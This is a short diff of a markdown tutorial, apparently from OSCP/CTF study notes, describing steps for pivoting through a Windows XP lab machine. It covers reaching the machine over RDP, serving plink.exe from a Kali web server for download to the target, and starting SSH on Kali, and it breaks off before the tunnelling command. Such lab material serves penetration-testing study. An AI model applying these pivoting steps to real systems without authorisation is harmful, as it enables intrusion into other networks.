hab1ts/CTF-OSCP-Stuff/Pivot Tutorial.md

   1. Connect to the Windows XP machine from your Kali Box: rdesktop 192.168.1.30
-  2. Download “plink.exe” from the Kali box to the Windows XP machine (plink.exe can be found on Kali -> “/usr/share/windows-binaries/plink.exe “-> Copy “plink.exe” to you web server root and start apache on Kali.Now you can download “plink.exe” on the Windows XP machine)
+  2. Download “plink.exe” from the Kali box to the Windows XP machine (plink.exe can be found on Kali -> “/usr/share/windows-binaries/plink.exe “-> Copy “plink.exe” to you web server root and start apache on Kali.
+Now you can download “plink.exe” on the Windows XP machine)
   3. Open a command prompt on the Windows XP machine and navigate to the place where you have saved “plink.exe”
   4. Start SSH Daemon on Kali-Box. /etc/init.d/ssh start
   5. Run the following command on the Windows XP machine: